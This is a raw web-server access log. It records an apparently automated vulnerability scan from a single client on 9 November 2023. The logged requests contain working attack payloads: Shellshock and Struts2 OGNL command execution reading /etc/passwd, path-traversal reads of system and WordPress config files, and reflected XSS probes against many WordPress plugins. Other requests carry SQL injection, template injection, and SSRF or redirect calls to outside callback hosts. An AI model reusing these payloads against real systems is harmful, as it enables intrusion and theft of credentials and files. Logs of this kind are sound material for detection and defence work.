()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 438 2023-11-09 17:10:01 103.153.214.94 GET /cgi-bin/test-cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 362 2023-11-09 17:11:23 103.153.214.94 GET /bonita/portal/themeResource theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 385 2023-11-09 17:11:25 103.153.214.94 GET /bonita/portal/themeResource theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 363 2023-11-09 17:12:23 103.153.214.94 GET /wp-content/plugins/church-admin/includes/validate.php id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 365 2023-11-09 17:12:25 103.153.214.94 GET / option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1163 2023-11-09 17:12:32 103.153.214.94 POST /wp-login.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 362 2023-11-09 17:12:34 103.153.214.94 GET /wp-admin/admin.php where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 362 2023-11-09 17:12:49 103.153.214.94 GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php file=/wp-content/uploads/../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 363 2023-11-09 17:13:09 103.153.214.94 GET /openwin.php redirurl=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 375 2023-11-09 17:13:17 103.153.214.94 GET /cgi-bin/koha/svc/virtualshelves/search template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 369 2023-11-09 17:13:22 103.153.214.94 GET /opm/read_sessionlog.php logFile=....//....//....//....//etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 386 2023-11-09 17:13:51 103.153.214.94 GET /wp-content/plugins/zip-attachments/download.php za_file=../../../../../etc/passwd&za_filename=passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 372 2023-11-09 17:14:12 103.153.214.94 GET /wp-content/plugins/stageshow/stageshow_redirect.php url=http%3A%2F%2Finteract.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 384 2023-11-09 17:14:19 103.153.214.94 GET /novius-os/admin/nos/login redirect=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 380 2023-11-09 17:15:13 103.153.214.94 GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php file=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 363 2023-11-09 17:15:37 103.153.214.94 GET /wp-content/plugins/wp-swimteam/include/user/download.php file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 376 2023-11-09 17:18:29 103.153.214.94 POST /login - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 1928 2023-11-09 17:19:02 103.153.214.94 GET /pages/ajax.render.php operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 369 2023-11-09 17:19:22 103.153.214.94 GET /wp-content/plugins/sourceafrica/js/window.php wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 361 2023-11-09 17:20:04 103.153.214.94 POST /cgibin/webproc - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 363 2023-11-09 17:20:46 103.153.214.94 PUT /_snapshot/test - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 375 2023-11-09 17:20:49 103.153.214.94 PUT /_snapshot/test2 - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 358 2023-11-09 17:21:20 103.153.214.94 GET /index.php option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 360 2023-11-09 17:21:21 103.153.214.94 GET / page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 373 2023-11-09 17:21:27 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 387 2023-11-09 17:21:33 103.153.214.94 GET /fw/mindex.do url=./WEB-INF/web.xml%3f 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 360 2023-11-09 17:21:33 103.153.214.94 GET /CMSPages/GetDocLink.ashx link=https://interact.sh/ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 357 2023-11-09 17:21:56 103.153.214.94 GET /spaces/viewdefaultdecorator.action decoratorName 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 363 2023-11-09 17:22:30 103.153.214.94 GET /index.php p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 385 2023-11-09 17:22:35 103.153.214.94 GET /Umbraco/feedproxy.aspx url=http://cl6fbhsfe7k9sg331pogkcn84dso86m5h.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 377 2023-11-09 17:23:44 103.153.214.94 GET /wp-content/plugins/wp-symposium/get_album_item.php size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 1107 2023-11-09 17:24:05 103.153.214.94 GET /wp-content/plugins/robotcpa/f.php l=ZmlsZTovLy9ldGMvcGFzc3dk 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 365 2023-11-09 17:24:26 103.153.214.94 GET /system/console .css 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 371 2023-11-09 17:26:38 103.153.214.94 GET /wp-content/plugins/admin-font-editor/css.php size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 360 2023-11-09 17:26:39 103.153.214.94 GET /wp-content/plugins/ajax-random-post/js.php interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 368 2023-11-09 17:26:46 103.153.214.94 GET /wp-content/plugins/anti-plagiarism/js.php m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 379 2023-11-09 17:26:49 103.153.214.94 GET /wp-content/plugins/defa-online-image-protector/redirect.php r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 365 2023-11-09 17:27:29 103.153.214.94 GET /wp-content/plugins/e-search/tmpl/date_select.php date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 367 2023-11-09 17:27:54 103.153.214.94 GET /wp-content/plugins/e-search/tmpl/title_az.php title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 365 2023-11-09 17:28:01 103.153.214.94 GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 363 2023-11-09 17:28:19 103.153.214.94 GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 382 2023-11-09 17:29:04 103.153.214.94 GET /wp-content/plugins/hdw-tube/playlist.php playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 366 2023-11-09 17:30:14 103.153.214.94 GET /wp-content/plugins/hdw-tube/mychannel.php channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 365 2023-11-09 17:30:17 103.153.214.94 GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 370 2023-11-09 17:30:25 103.153.214.94 GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1104 2023-11-09 17:30:36 103.153.214.94 GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 371 2023-11-09 17:30:37 103.153.214.94 GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 361 2023-11-09 17:30:37 103.153.214.94 GET /wp-content/plugins/new-year-firework/firework/index.php text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 369 2023-11-09 17:31:23 103.153.214.94 GET /wp-content/plugins/parsi-font/css.php size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 368 2023-11-09 17:31:23 103.153.214.94 GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 363 2023-11-09 17:32:16 103.153.214.94 GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 364 2023-11-09 17:32:35 103.153.214.94 GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 361 2023-11-09 17:32:57 103.153.214.94 GET /wp-content/plugins/s3-video/views/video-management/preview_video.php media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 363 2023-11-09 17:35:14 103.153.214.94 GET /wp-content/plugins/simpel-reserveren/edit.php page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 371 2023-11-09 17:35:18 103.153.214.94 GET /wp-content/plugins/tidio-form/popup-insert-help.php formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 2010 2023-11-09 17:35:25 103.153.214.94 GET /wp-content/plugins/whizz/plugins/delete-plugin.php plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 1088 2023-11-09 17:35:26 103.153.214.94 GET /wp-content/plugins/tidio-gallery/popup-insert-help.php galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 17:36:10 103.153.214.94 GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 366 2023-11-09 17:36:40 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 387 2023-11-09 17:37:24 103.153.214.94 GET /jsrpc.php type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 369 2023-11-09 17:37:51 103.153.214.94 GET / author=1 443 - 101.35.195.134 - - 200 0 0 372 2023-11-09 17:38:18 103.153.214.94 GET /monitoring/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 11 0 1478 2023-11-09 17:39:39 103.153.214.94 POST /wp-content/plugins/wsecure/wsecure-config.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 1688 2023-11-09 17:39:54 103.153.214.94 GET /wp-content/plugins/ebook-download/filedownload.php ebookdownloadurl=../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 363 2023-11-09 17:40:39 103.153.214.94 GET / s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 375 2023-11-09 17:40:57 103.153.214.94 POST /boardDataWW.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 361 2023-11-09 17:41:49 103.153.214.94 GET /XMII/Catalog Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 367 2023-11-09 17:42:21 103.153.214.94 GET /index.action method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 365 2023-11-09 17:42:28 103.153.214.94 GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php pl=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 361 2023-11-09 17:42:31 103.153.214.94 GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php pl=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 360 2023-11-09 17:42:45 103.153.214.94 GET /login redir=http://www.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 380 2023-11-09 17:42:57 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 365 2023-11-09 17:44:00 103.153.214.94 PUT /fileserver/2XwZKnWOpkdnLvcOO8yH5B8q09I.txt - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 368 2023-11-09 17:44:03 103.153.214.94 GET /fileserver/2XwZKnWOpkdnLvcOO8yH5B8q09I.txt - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 362 2023-11-09 17:44:07 103.153.214.94 GET /oauth/authorize response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 1105 2023-11-09 17:44:15 103.153.214.94 GET /BSW_cxttongr.htm - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 418 2023-11-09 17:45:05 103.153.214.94 GET /cgi-bin/;cat$IFS/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 372 2023-11-09 17:45:08 103.153.214.94 GET /servlets/FetchFile fileName=../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 370 2023-11-09 17:45:50 103.153.214.94 GET /cgi-bin/logoff.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 398 2023-11-09 17:46:02 103.153.214.94 GET /command/prima-factory.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 368 2023-11-09 17:46:22 103.153.214.94 GET /ecrire/ exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 376 2023-11-09 17:47:08 103.153.214.94 GET /visualrf/group_list.xml aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 363 2023-11-09 17:48:19 103.153.214.94 GET /DnnImageHandler.ashx mode=file&url=http://cl6fbhsfe7k9sg331pogu1dxb7t351mau.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 373 2023-11-09 17:49:51 103.153.214.94 GET / redirect=/\interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 401 2023-11-09 17:49:58 103.153.214.94 GET 